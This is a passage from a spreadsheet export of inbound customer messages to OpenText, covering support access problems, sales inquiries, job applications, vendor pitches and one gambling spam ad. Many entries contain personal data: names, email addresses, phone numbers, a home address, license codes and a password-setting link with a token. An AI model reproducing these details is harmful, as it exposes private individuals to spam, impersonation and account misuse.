Auf einem Etikett dieser Geräte findet sich die Computer Gesellschaft Konstanz mbH, die laut dem Wikipedia-Artikel https://de.wikipedia.org/wiki/Computer_Gesellschaft_Konstanz letztlich in Ihrem Unternehmen aufgegangen ist._x000D_
_x000D_
Könnten Sie uns ein passendes Gerät empfehlen, dass diesen Barcode lesen kann? Es wäre auch hilfreich, wenn wir genaueres über diesen Barcode erfahren würden, z.B. eine genauere Bezeichnung oder den Algorithmus, mit dem er erstellt wird. Vielleicht finden Sie noch Unterlagen darüber?_x000D_
_x000D_
Eine andere Möglichkeit wäre vielleicht, die Ziffern per OCR zu erfassen, aber üblicherweise werden von Handscannern nur die Zeichensätze OCR-A und OCR-B unterstützt, und die Ziffern auf unseren Etiketten sind offensichtlich aus einem anderen Zeichensatz. Können Sie vielleicht herausfinden, welcher Zeichensatz das ist?_x000D_
_x000D_
Wir bitten um eine möglichst zeitnahe Antwort._x000D_
_x000D_
Mit freundlichen Grüßen,_x000D_
Klaus-Dieter Schmidt_x000D_
Universitätsbibliothek Kassel –_x000D_
Landesbibliothek und Murhardsche Bibliothek der Stadt Kassel_x000D_
Abteilung III: Digitale Bibliotheksdienste_x000D_
Bibliotheksspezifische Hard- und Software_x000D_
http://www.uni-kassel.de/ub</t>
  </si>
  <si>
    <t>I am transfering from EMC support to Opentext support for United States Marshall Services. I currently have an active EMC support account under adam.yartas@usdoj.gov. My EMC siteID is 1003936446. Can you please transfer my account to OpentText for the same siteid support. Please feel free to get in touch with me at my number or email._x000D_
Thank you_x000D_
Adam Yartas</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
We would like to solicit your gracious presence as a sponsor at the upcoming 19th International Conference on Cataract and Refractive Surgery during 16-17 July, 2018, Atlanta USA_x000D_
_x000D_
The event will attract visitors from a wide range of Universities and Industries such as: Professors, Students, Industry Professionals, Chemists, CEO’s, Pharma Industry Delegates, Post docs, Entreprenuers, Business Delegates and industrialists related to ophthalmology and medical sciences. It is a remarkable international event to exhibit and espouse your products and sell for profitable benefits and to make a promotion all over the world._x000D_
Your Company/Organization will be displayed on our Conference Banner, Bags and booklet._x000D_
_x000D_
_x000D_
For conference details please click  http://cataractsurgery.alliedacademies.com/_x000D_
</t>
  </si>
  <si>
    <t>we have a macro to input the Document ID but it moves/erases the text already in the footer. I would like to know if there is a known solution for this area. We are on eDocs DM 5.3.1.</t>
  </si>
  <si>
    <t>I'm trying to open a SR related to DA 7.2 product. Unable to find the product in the dropdown when opening a SR. _x000D_
I received an email from Open Text Connect for registration confirmation. The link provided in the email does not navigate to the registration site._x000D_
https://www.opentext.com/2/global/sso_controller-main?sys_action=setpassword&amp;email=mzang@express-scripts.com&amp;x=4s!T_Nk7e2&amp;cams_original_url=_x000D_
When attempting to register using the OpenText website my prior user id/pswrd is flagged already in use. When attempting to sign in using existing user id/pswrd credentials are flagged invalid.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are curious who our client relationship manager is for Vontobel Asset Management. My name is Devin Domingo and I help represent Vontobel Asset Management as their IT partner. Matt Duteau, their director of technology and cybersecurity, is looking to conduct a 52 question yes/no survey assessment of OpenText's IT practices and risk. Can you please let us know if this is something we can do or discuss further with a client relationship manager, please?_x000D_
_x000D_
Best,_x000D_
Devin Domingo</t>
  </si>
  <si>
    <t xml:space="preserve">Having problems setting up my PIN and password. </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I Just saw your linkedin post for the Southern Europe a Legal Counsel Position and I hope it was not filled yet. I am a Brazilian attorney admitted to Paris Bar having lived one year in Canada (Edmonton), in Brazil and off course in France. I have worked on IT contracts on my current position and adore learning about new technology subjects. I worked for Aviat Networks France as a commercial legal counsel and was responsible for a wide geographical scope (my manager, legal Aviat's VP, was based in California). I speak Portuguese, French and English fluently and am keen on learning new languages, such as Spanish. I hope you consider my application for this position._x000D_
_x000D_
Kind regards,_x000D_
Joana_x000D_
0695404360_x000D_
Joanasilveira@yahoo.com</t>
  </si>
  <si>
    <t>As a member of AMPLEXOR Professionnal Services, I would like to gain access to MySupport to download binairies for Documentum products for our customers (Nestlé, AREVA...)</t>
  </si>
  <si>
    <t>cannot set password using https://login.opentext.com/connect/setpassword.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am trying to open a new support ticket for a Documentum system._x000D_
I found out the support for Documentum has migrated from EMC to OpenText support._x000D_
I can log into the OpenText support site._x000D_
I tried opening a new ticket and it responds with a page that says:_x000D_
No Access_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
Almost there!_x000D_
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us._x000D_
Please click on the link below to complete the process_x000D_
_x000D_
I clicked the link, received a confirmation email and confirmed my email address._x000D_
After that I still can't create a new ticket._x000D_
Please helpe me get access to your support._x000D_
_x000D_
BR,_x000D_
_x000D_
Sander Hendriks</t>
  </si>
  <si>
    <t>I have few Queries regarding Documentum Server Upgrade. Initially, in EMC Support Portal, we used to create SR for Documentum related Queries. Now Documentum/Webtop is not getting listed as Product and so not able to create SR in EMC Support Portal- https://support.emc.com_x000D_
Please let know the site(not Blogs or Forums) where Queries related to Documentum will be addressed.</t>
  </si>
  <si>
    <t>What is the latest version of Exceed?  I am at V14.0.0.376 and I want to upgrade to the current version.  Thanks</t>
  </si>
  <si>
    <t>HI,_x000D_
We are looking forward for a training for Doculink. I could find one training on your site: 3-2015 DocuLink for SAP Solutions - Customizing (formerly 770)._x000D_
_x000D_
I wanted to check if this training is available in USA or can a resource join this remotely? Our resource is located in Philedelphia and we need this training only for 1 resource._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Building an ECM practice</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I had a account for the documentum support and it seems not have been migrated._x000D_
I didn't receive a notification by mail._x000D_
So I create a opentext account but I don't have the full access support._x000D_
_x000D_
best regards,_x000D_
Axel Batta</t>
  </si>
  <si>
    <t>!!! An die Marketingabteilung !!!_x000D_
_x000D_
Sehr geehrtes Open Text-Marketingteam,_x000D_
da ich Sie leider nicht telefonisch erreichen konnte, kommt jetzt auf diesem Weg unsere Vorstellungsemail für Sie._x000D_
Vielleicht benötigen Sie ja für die Connecticum, über die wir auch auf Sie aufmerksam geworden sind, noch ein paar tolle Giveaways, hochwertige Kundenpräsente oder Ähnliches. _x000D_
Dieses Jahr feiern wir unser 10 jähriges Bestehen von Promosolution und bringen somit jede Menge Erfahrung in unserem Metier mit._x000D_
Wir bieten Ihnen darum als Willkommensgeschenk 10% Rabatt (inkl. Druckkosten) auf die erste Bestellung aus unserem aktuellen Katalog: _x000D_
_x000D_
http://katalogserver.de/promosolution/1/_x000D_
http://katalogserver.de/promosolution/2/_x000D_
 _x000D_
Lassen Sie sich von unserem vielfältigen Produktsortiment, welches Sie auf unserer Website unter www.promosolution.de finden, inspirieren. _x000D_
_x000D_
Auf www.promosolution.de/referenzen finden Sie einen kleinen Überblick unserer Kunden und realisierte Kundenprojekte wie Daimler, Porsche, viele Stadtwerke, namhafte Hotelketten wie z.B. Regent, Titanic usw._x000D_
_x000D_
Ein persönlicher Tipp von mir: Sprechen Sie uns mit Ihren Wünschen und Ideen direkt an._x000D_
Unsere Website und der Katalog beinhalten nicht die komplette Bandbreite an Artikeln, die wir für Sie zur Auswahl haben. Wir können viel mehr ;-)_x000D_
_x000D_
Eine unserer Stärken ist die Herstellung von USB-Sticks mit Qualitätsspeichern z.B. SAMSUNG etc., Powerbanks, Fitnessarmbändern und USB Ports zu unschlagbar günstigen Preisen._x000D_
Weiterhin haben wir uns auf Sonderanfertigungen bei Werbeartikeln spezialisiert, die nicht jeder hat._x000D_
In fast allen Branchen haben wir hier bereits sehr viele begeisterte Kunden, die dies zu schätzen wissen._x000D_
 _x000D_
Mit der richtigen Werbung, wird Ihr Erfolg gefördert!_x000D_
 _x000D_
Sicher werden Sie sich von unseren Qualitätsstandards überzeugen können, denn diese sind unsere höchste Priorität! Sie können sich mit Ihren Anfragen vertrauensvoll an uns wenden._x000D_
 _x000D_
Als Fullservice-Partner und Werbemittel-Direktimpo</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
My name is Claudiu Cocioban and I am the Business Development Manager at Holisun company._x000D_
I am contacting you because Opentext does business with industries companies. We have received your contact details from  TWC._x000D_
_x000D_
Because of your experience, we consider that the partnership that we propose is ideal for your expanding your portfolio and increase the sales. _x000D_
More specifically, we propose you a partnership for selling our solution of remote mobile assistance and support, AR Assistance (https://www.holisun.com/en/products/ar-assistance.html), with a large applicability in industry, education and training, warehousing, medicine and defense. You can see the benefits of being a reseller for Holisun at https://www.holisun.com/en/company/become-a-reseller.html._x000D_
_x000D_
We are sure that we can develop/grow a profitable collaboration. Between 16.09-19.09.2017 we will be attending Midsize Enterprise Summit in San Antonio, Texas. _x000D_
_x000D_
For more informations please contact us on email claudiu.cocioban@holisun.com or visit our web page www.holisun.com._x000D_
_x000D_
Best regards,_x000D_
Claudiu Cocioban_x000D_
</t>
  </si>
  <si>
    <t>Sanaari one Of Leading IT Company, Sanaari Provide Services 1) Corporate Training, 2) Corporate Online Training, 3) Corporate virtual Training and 4)Staff On consulting for IT Positions._x000D_
_x000D_
If you have any kind of Corporate Training Requirement feel free to contact us at: shivkumar@sanaari.net_x000D_
_x000D_
www.sanaari.net_x000D_
Call or Whatsup: 8008814567</t>
  </si>
  <si>
    <t>Please provide quotation on MBPM V9x training. all modules especially Administration. Please also advise on available training dates.</t>
  </si>
  <si>
    <t>★免水菜金 驻测即宋18-88圆 满百提 ~！！_x000D_
专属客服QQ:355915762 _x000D_
专属链接:www.youle138.com _x000D_
备用链接:www.youle810.com _x000D_
限时寸30宋36，寸20宋28~！！_x000D_
专属链接柱测出分更佳~！！_x000D_
下APP可得8-88鸿包，随时随地掏机即玩~！_x000D_
【八大劳虎击平台、真人、捕鱼、体育】玩法多多~！</t>
  </si>
  <si>
    <t>Morning,_x000D_
_x000D_
Please can you provide information on your Content Management System, and especially any examples of deployment in a port or airport environment._x000D_
_x000D_
Kind regards,_x000D_
Sam</t>
  </si>
  <si>
    <t>Reason for missed bills, status of current account</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
My name is Paul Smith associated with InfoGlobalData, a Data Intelligence firm based out of Seattle, WA. _x000D_
InfoGlobalData specialize in services such as:_x000D_
Custom List Building: Based on your Target Industry, Target Job Title and Location._x000D_
Data Appending: Filling missing information such as email address, phone numbers, etc. in to your existing customer database)_x000D_
Data Cleansing: Deleting invalid records and replacing with current information to your existing customer database) and Email campaign._x000D_
If interested, do let me know what type of Services you are looking for? _x000D_
_x000D_
Respectfully, _x000D_
_x000D_
Paul Smith _x000D_
InfoGlobalData _x000D_
pauls@infoglobaldata.com_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Would like to see a demo regarding your Documentum Product, we are interested in seeing what it has to offer. </t>
  </si>
  <si>
    <t>I need to talk to somebody about LiveSite 8.2. It's urgent..._x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Quote request; referred to you by LanSlide.</t>
  </si>
  <si>
    <t>We are a small school district with only 2 schools, we are looking for a messaging system for our staff. Could you please get me some info on Firstclass?_x000D_
_x000D_
Thanks!_x000D_
_x000D_
Jennifer</t>
  </si>
  <si>
    <t>I am attempting to find the current owner of the ImageBasic toolkit, originally developed by Diamond Head software.  It was acquired by Hummingbird, and then Hummingbird was acquired by OpenText._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Regarding "OpenText Analytics Workshops":_x000D_
1) Is this workshop chargeable?_x000D_
2) Can you send the schedule &amp; venue for the workshop in Mumbai?_x000D_
_x000D_
Br,_x000D_
Preety</t>
  </si>
  <si>
    <t>Can't create and maintain D2 help desk tickets; need assistance in how to do this and be able to create other help desk tickets for other Documentum products.  Thanks.</t>
  </si>
  <si>
    <t>Support and Knowledge sites are inaccessible for me. I keep getting prompted to log in, and try to go to MySupport or the KC, but no luck. Please let me know if the site is having issues, or if it's my account.</t>
  </si>
  <si>
    <t>Unable create account/reset password</t>
  </si>
  <si>
    <t>I am looking for solution / option to be able to use our rightfax to send faxes through you vs our on-prem board servers.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello! _x000D_
Please note (BLISS INOVIS CATALOG – ID 122129316376) seems to be inactive as I can not log in under any of our user accounts. However after checking with our accounting team it seems we are up to date and made a payment last week. Please advise as we need to be able to access the GXS catalog for customer orders._x000D_
_x000D_
Thanks!_x000D_
MELISSA NUNEZ_x000D_
SALES ANALYST/SALES SUPPORT MANAGER_x000D_
_x000D_
 _x000D_
145 S. Fairfax Ave., Ste. 400, Los Angeles, 90036_x000D_
O (323) 602-1253 | E melissa.nunez@blissmail.com_x000D_
</t>
  </si>
  <si>
    <t>What is the cost of the RightFax Client and is it compatible with an older RightFax server or do both need upgrading at the same time?  Can the RightFax client be published in a Citrix environment with a server 2012 operating system?  We tried our current version 10.0.0.4052 but we get a 1797 error for a custom action which means the printer driver is not compatible with the operating system.  Any advice would be gratefully appreciated.  Have a safe an awesome day.  Thanks</t>
  </si>
  <si>
    <t>Sales inquiries for BIRT iHub and Analytics Designer</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We would like to know more about TeleForm product since we have following use case-_x000D_
_x000D_
Use Case-_x000D_
_x000D_
We would like to process typed and handwritten documents and recognize the information from it so that _x000D_
it can be stored in another software e.g. in a database or even word or pdf._x000D_
The Documents to be processed can have either typed and handwritten characters._x000D_
Hence, the product needs to have capability to both OCR as well as ICR._x000D_
_x000D_
I would like to know following information regarding the product._x000D_
1) Is it possible to integrate the product with another tool?_x000D_
2) Licensing information about the product._x000D_
3) All the other use cases where this product can be used._x000D_
_x000D_
Please let us know if you are able to demo the product features._x000D_
_x000D_
Thanks,_x000D_
Nikhil Dole_x000D_
Sr. Consultant_x000D_
Plymouth Rock Assurance_x000D_
Boston,MA</t>
  </si>
  <si>
    <t>I have raised one ticket to opentext and they have shared _x000D_
https://knowledge.opentext.com/knowledge/llisapi.dll/open/10151494 in response to my query. When I am trying to access the link it says I don't have access. Please help me with access.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
A branch in our Department requires a solution to fax a document off a desktop. Is there a product demo or trial version available? _x000D_
Please let me know the requirements and how much it would cost to deploy the initial solution. Appreciate to hearing from you soon._x000D_
Thanks, Vicky_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am interested in acquiring the product "OpenText Information Hub", for use in the implementation of a business intelligence application and data analysis, and then implement it in our clients. For this reason I am interested in your products and wish to obtain information about your products, from the point of architecture, hardware and software requirements, such as the licensing mode required by our company to carry out the development, as well as the licensing required to perform the Sale of the product developed with OpenText to our customers._x000D_
_x000D_
Thanking the attention given to the present._x000D_
_x000D_
P.D. For Call only Spanish</t>
  </si>
  <si>
    <t>I need Exceed Opentext 14 or the latest msi file</t>
  </si>
  <si>
    <t>bonjour j'espere que vous aller bien jaimerai savoir si vous vendiez votre nom de domaine easylink.com _x000D_
_x000D_
magnifique journee a vous</t>
  </si>
  <si>
    <t>I am interested in potentially engaging Opentext on behalf of the University of Pennsylvania.  Central procurement will be issuing an RFI.  Can you provide a POC for receiving an RFx.</t>
  </si>
  <si>
    <t xml:space="preserve">Por favor necesito cotizar la actualización de mis 5 licencia a TD 7.0. Actualmente tenemos TD 6.1 SP2:_x000D_
Código de confirmación : YRX9VRW9URUU9YAJ_x000D_
PMC :0CBB8219-FD554677-3A1D53B4-3173F0F6_x000D_
_x000D_
Por favor necesito un contacto en Latino América para ver este tema_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">While updating my password I keep getting Password Update failure even though the system indicates Strong password. What are the pwd rules, and can we not reuse parts of previous passwords?  </t>
  </si>
  <si>
    <t>I don't think I have proper rights set up for my account. Please mimic the authorizations and permissions of the mpiere@mmm.com account._x000D_
_x000D_
I am trying to reach this knowledge page and am being denied access:_x000D_
_x000D_
https://knowledge.opentext.com/knowledge/cs.dll/kcs/kbarticle/view/KB547502</t>
  </si>
  <si>
    <t>We are running IXOS 10.5; what version is available now? Cannot find on your site!</t>
  </si>
  <si>
    <t>please advise how to see approved elite points and a historu of submissions._x000D_
1M thnx in advance!_x000D_
KR - AB</t>
  </si>
  <si>
    <t>Cannot download former EMC Enterprise Content Division (ECD) software from emc.support.com. Have you migrated the ECD customers/partners accounts from EMC? Can you migrate mine (mikael.thorell@altran.com)?</t>
  </si>
  <si>
    <t>Why is My email address is no longer in your system? I purchased Brava Desktop: PIN 358010, ID QDS0CA0057FL.</t>
  </si>
  <si>
    <t xml:space="preserve">I was working a Documentum ticket through EMC, (SR #08439401), but cannot access it now.  They say I have to go through OpenText Suppoort.  I've requested access; how long does it take.  This ticket is a high priority issue for us and we need to get it resolved, but we need Documentum support to assist us.  </t>
  </si>
  <si>
    <t>Unable to open a support ticket</t>
  </si>
  <si>
    <t>Need to know license models for some OpenText products.</t>
  </si>
  <si>
    <t>Interested in upgrading Spicer version 7.4 to latest version. Please contact me as soon as possible. Thank you.</t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
we are members of a team, seeking to enhance academical teaching and learning by integrating digital media solutions._x000D_
_x000D_
As a part of the Technical University of Brunswick (Germany) we are keen to identifiy tools, that could be of benefit for our university and other academical institutions. _x000D_
_x000D_
Aurasma was one of our samples and seems to have great potential. Unfortunately we are experiencing several technical difficulties – which leaves us wondering, if there will be any updates or software developments in general? Somehow it appears to be out of service, which would be quite disappointing to us. (We applied for the edu license 4 month ago and received an answer.) _x000D_
_x000D_
One of our main issues is the use of transparent videos. Alpha channels will only be accepted  as a FLA-file, which is outdated and can´t be produced with most common video tools any more. The attempt of integrating 3D material confronts us with similar difficulties. _x000D_
We would like to know, if there is any kind of support for Aurasma, that would provide an individual service? Is the small support section you´ll find here …  https://aurasma.zendesk.com/hc/en-us/signin?return_to=https%3A%2F%2Faurasma.zendesk.com%2Fhc%2Fen-us%2Frequests  … the only way to receive any kind of „help“? Or can one actually get in touch with real people? That would be very satisfying._x000D_
_x000D_
We would be very happy to receive any information that will lead us to a bigger picture in this matter (... and hopefully to a human individual to talk to.)_x000D_
_x000D_
Yours sincerely,_x000D_
_x000D_
Jennifer Olearczyk</t>
  </si>
  <si>
    <t>My company FLAI Group is engaged in the supply of office furniture and is a representative of European furniture factories: VITRA AG, Sedus, HAY, Johanson Design and others._x000D_
_x000D_
My colleagues said that your company is now planning a new office, I want to ask if you can consider our company as a possible supplier?  And swith whom to me is better to communicate. _x000D_
_x000D_
Thank you in advance!_x000D_
Yury Loktev_x000D_
Director of Development</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Ma'am,_x000D_
_x000D_
We are a finishing school based out of Hyderabad. We have students trained in multiple softwares, aptitude, soft skills and they are industry ready. Kindly let us know whom we can contact regarding the opportunity for placements. Thank you._x000D_
</t>
  </si>
  <si>
    <t>The development Cordys server of Aviva has crashed. Please provide immediate support by providing the installer/ restoration steps to reinstall the same._x000D_
if you need any license details then please let me know</t>
  </si>
  <si>
    <t>Paratus AMC are looking to replace a Document Management System and implement Business Process Management.  To this end we have prepared 2 Requests for Proposals and would like to send them through to OpenText.  Could you please supply name(s) and email address so that we send them through to the most appropriate person.  Many thanks, Julie</t>
  </si>
  <si>
    <t xml:space="preserve">Interest in Records Management System. Hoping to get a demonstration of system capabilities. </t>
  </si>
  <si>
    <t>We are searching an archiving solution for our company needs.</t>
  </si>
  <si>
    <t>I have an account set but it appears to need updating - I can't find where to apply the 'Group Admin' setting to my account but it should be set that way._x000D_
Additionally there are 2 user accounts associated with our Agency who are no longer with AFSA. Could these please be removed (Scot Trapman &amp; Bob Harris)</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for reporting software to embed in our application. We need it to be completely white labeled as our product is white labeled by many of our clients. I have an RFP I can send listing all our requirements, we are working on getting bids and would like to choose a solution in September and implement it by December 2017. </t>
  </si>
  <si>
    <t xml:space="preserve">FRED AZER _x000D_
_x000D_
1 Tracy drive ¨ Manalapan, NJ 07726 ¨ Tel (732) 890-9499_x000D_
fredrick143@hotmail._x000D_
 _x000D_
You will find me to be an effective, cooperative team member dedicated to meeting established objectives.  I am seeking a position which will enable me to apply and further develop my skills while making a positive contribution to the company.  _x000D_
_x000D_
Granted the opportunity to meet with you for a personal interview, I am confident that I will demonstrate how my training, abilities, and genuine enthusiasm may be mutually advantageous. _x000D_
_x000D_
Thank you for your consideration. _x000D_
_x000D_
Sincerely,_x000D_
_x000D_
_x000D_
Fred Azer _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
2 / 2_x000D_
Fred Azer _x000D_
1 Tracy drive ¨ Manalapan, NJ 07726 ¨ Tel (732) 890-9499_x000D_
_x000D_
_x000D_
EDUCATION: Rutgers College, New Brunswick, NJ;  BA, 1998 _x000D_
Major: Economics  Minor:Communications _x000D_
_x000D_
EXPERIENCE: _x000D_
5/02-date  Entrepreneur, selling credit card processing service and hardware tools. _x000D_
4/01-4/02 Horizon Blue Cross Blue Shield of New Jersey, Newark, NJ  Sales Representative _x000D_
    * 		¨ Sales Representative for Individual Health Insurance Plan, Supplementary Insurance for Medicare beneficiaries as well as New Jersey's State Plan Medicare Blue. _x000D_
    * 		 _x000D_
    * 		¨ Top sales producer, having earned 132% of 2001 goal; qualification for the President's Circle. _x000D_
    * 		 _x000D_
    * 		¨ Customer interaction on a daily basis explaining products, closing sales, and following through to ensure proper customer enrollment. _x000D_
    * 		 _x000D_
    * 		¨ Learned and mastered company's operating systems.  _x000D_
    * 		 _x000D_
    * 		¨ Gained strong experience in customer satisfaction. _x000D_
    * 		 _x000D_
_x000D_
_x000D_
11/99-1/01  John Hancock; Manalapan, NJ  Training as Financial Advisor  _x000D_
    * 		¨ Became knowledgeable of the financial world we live in today and how we may be of assistance in securing clients' futures through investments, life insurance and health insurance products. _x000D_
    * 		 _x000D_
    * 		¨ Perfected different marketing strategies through a series of lectures held by marketing experts. _x000D_
  </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We’re conducting a market scan on behalf of an Australian retail group to identify potential options for a Digital Asset and Content Marketing Management solution._x000D_
_x000D_
We hope to release a Request for Information document early next week._x000D_
_x000D_
Could you please advise the contact details (including email address) of the best person to forward the documentation to within your company?_x000D_
_x000D_
Regards,_x000D_
_x000D_
Mark_x000D_
</t>
  </si>
  <si>
    <t>This is not sales contact .... Please send this message directly to your CEO.   I have been trying for this entire year to get OpenText to produce a list of all of the OpenText products we use, the due date of the maintenance renewal, the amount due and any governing license agreements.  Apparently that is an impossible task for your team to handle, several people have tried but can only give me a silo'd view from their segment of the business.  The problem is apparently the way OpenText has grown through acquisition and not integrated the acquisitions into the company.  As a company, I believe MetLife is spending several million dollars per year with OpenText but yet OpenText doesn't provide account management that matches our spend.  You account management structure should be more like the other big software companies we deal with, like an IBM or Oracle.  They provide one software account manager for us to deal with.  Then it is up that account manager to bring in the correct rep from that part of your business to deal with us.  We never know who we are supposed to contact for which one of your products.  It makes dealing with your company a frustrating, impossible process, at least from a procurement perspective.  Someday I look forward to seeing a full report on our relationship, products owned, maintenance costs, due dates, etc.  Until then I will continue to struggle to deal with OpenText and will look for any opportunity to have our users consider other products from a company that can provide an acceptable level of account management._x000D_
Fred</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am looking to complete a verification of employment for Mandeep Singh. I was unable to get an operator on the main line. Please provide me with a fax number or email I can send the request form to. Thank you.</t>
  </si>
  <si>
    <t>I would like to talk with someone about the OpenText platform. We are going through a CMS evaluation with one of our clients and want to find out more to better advise them.  Please contact me via email at brian.walter@modea.com</t>
  </si>
  <si>
    <t xml:space="preserve">I had an Easylink fax number setup in February 2014, below is the information I got back then:_x000D_
_x000D_
Below is your registered fax number(s) and e-mail address(es) for inbound service:   _x000D_
_x000D_
       19197108720  yuxin.zhang@quintiles.com_x000D_
_x000D_
I sent an email to 19197108720@faxmail.com earlier today, but never received any email at yuxin.zhang@quintiles.com. Could you please check if this fax number still works with my email. _x000D_
_x000D_
Thanks. </t>
  </si>
  <si>
    <t>I am designing a enterprise model and org structure as part of a project and I feel ProVision might be a great tool. Is it possible to get a free trial?</t>
  </si>
  <si>
    <t>request product eval of ProVision for near term purchase decision (ProVision vs IBM Rhapsody, Sparks Enterprise Architect, and No Magic Cameo Enterprise Architecture)</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
Do you offer a demo to give a basic overview of your document management system? _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I would like download of OpenText Brava for HTML/WEB.  Is there a download you can forward to try out.  Please do the needful and revert ASAP...</t>
  </si>
  <si>
    <t>gathering basic information on an EDI partner for a small user</t>
  </si>
  <si>
    <t>I'm looking for resources for supporting Application Xtender, installation packages, updates, documentation.</t>
  </si>
  <si>
    <t>Is it possible to set up accounts for my other team members that also work on metastorm?</t>
  </si>
  <si>
    <t xml:space="preserve">  ERRORS UPLOADING SPRING 2018 LINE</t>
  </si>
  <si>
    <t>Please contact via e-mail.  Some of our users us Vignette V7 Business Integration Studio.  We need to find a newer version of that software, providing the same functionality, so we can move to a newer environment.  Please provide info if possible, thank you!</t>
  </si>
  <si>
    <t>We have a potential opportunity for Opentext and need a contact. Thank you.</t>
  </si>
  <si>
    <t>We have a customer with a requirement for a variety of software license renewals. We require a quote for these products.</t>
  </si>
  <si>
    <t>Pour Madame MOYSAN_x000D_
Merci de me donner les modalités pour résilier le contrat qui nous lie</t>
  </si>
  <si>
    <t>What are my options for receiving technical support if we do not have a support contract?</t>
  </si>
  <si>
    <t>Problem with my support user account, I can't access to Documentum Support site with my credential the following error appear_x000D_
_x000D_
Error Page_x000D_
_x000D_
Application has encountered an error. Please contact connect@opentext.com.</t>
  </si>
  <si>
    <t xml:space="preserve">Our company have collaborated with your company EasyLink Services International Ltd in 2017 year. Due to our company need the orginal tax residence of your company for 2017 year._x000D_
Accoridng to Polish rules if we not have acutally tax residence certificate we are obligate to calculate and pay to Pollish Tax Office witholding tax in rate 20% from every purchase of invoices of services.   _x000D_
Could you please tell me with who I should contact in this case? Maybe you can give me an email to someone from the tax or accounting department?_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Enquiry for renewal of our partnership which expired.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I'm working on Documentum technology and I have been informed by EMC/DELL that support is now provided on OpenText (mysupport)._x000D_
_x000D_
Can you grant me access ? How can I, as a partner, access to Documentum ressources (binaries, documentation etc..)_x000D_
Also, is there any Administrator profile for partners ? I was an administrator on EMC/DELL support, I would like to be the same on OpenText support._x000D_
Regards,_x000D_
Jérémy_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We have several Rightfax Servers running 10.50 Enterprise (w/FP1 SR1). We plan to create a .NET service to fetch faxes from RIGHTFAX server. I have a few questions regarding COM API:_x000D_
_x000D_
 Is the COM API 64-bit compatible? Will it work on Windows 2016 server?_x000D_
 Can you please provide some documentation for COM API?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Priya Saxena_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
I would like to inquire if in the near future OpenText will offer a new product line for _x000D_
TEXT TOP Buddy..which is a STAND ALONE Monitor which allows for controlling all _x000D_
Smart APPs from the TEXT TOP Buddy which is controlled by texting and downloading from all other devises such as digital cameras, cell phones, tablets,other devises which allows for downloading of smart apps.  The TEXT TOP Buddy is a center of all texting features for clicking on the Smart Apps which is refresed to allows for the pics, or other images to be texted and resent back to these devises or trouble shoot and open the images or other information such as email to the smart apps which can be texted back to the sender email or cell phone or social media.  The TEXT TOP Buddy is for home use only._x000D_
The TEXT TOP Buddy is composed of only Smart Apps...which all Smart Apps can be texted back to others users of various devises.</t>
  </si>
  <si>
    <t>I am interested in sending some of my staff on training for the LiquidOffice product. Kindly send pricing and more detail. Thanks.</t>
  </si>
  <si>
    <t>Wanting to obtain a quote for Right Fax</t>
  </si>
  <si>
    <t>Greetings, _x000D_
_x000D_
My firm, Enel Split d.o.o. from Croatia is currently owner of Unify Team Developer v. 5.2. SP1 for one user._x000D_
_x000D_
How can we upgrade our license to a newer, latest version of it?_x000D_
_x000D_
Can you send me a offer on my email?_x000D_
_x000D_
Thank you in advance,_x000D_
_x000D_
Marin Barisic</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
wir sind an ihrem Produkt OpenText Media Management (ab Version 16) interessiert. Wäre es möglich dass sie uns hierzu gesammelte Informationen auf Deutsch zukommen lassen? Gerne können wir auch ein Webinar vereinbaren. Wir haben bereits ein MAM-System im Einsatz, überlegen jedoch dieses abzulösen._x000D_
Beste Grüße,_x000D_
Markus Stegmann</t>
  </si>
  <si>
    <t>Can you please give me Australian contact details (if necessary) to purchase BI Query )Admin license). I have used this product for a number of years and would like to investigate purchasing it for my new supplier so I can set up views and create reports over our ERP. Our ERP is on a sequel database. I possible can we receive a demo model of BI Query so I can show this to colleagues before we make a decision. Kind Regards. Michael Stewart</t>
  </si>
  <si>
    <t>LFS RFI for Enterprise Service Bus solution - urgent. Kindly provide us with a sales contact details for Germany.</t>
  </si>
  <si>
    <t>Unable to access My Support link, could you please activate the my id.</t>
  </si>
  <si>
    <t>Need assistance for getting access on support.opentext.com site to raise support/service tickets</t>
  </si>
  <si>
    <t>Hello I need to get formula one for Visual Basic 6. Could you please help me ?</t>
  </si>
  <si>
    <t xml:space="preserve">I am a Security Researcher and i have found some security vulnerabilites in your web application should i report them_x000D_
directly here ?_x000D_
_x000D_
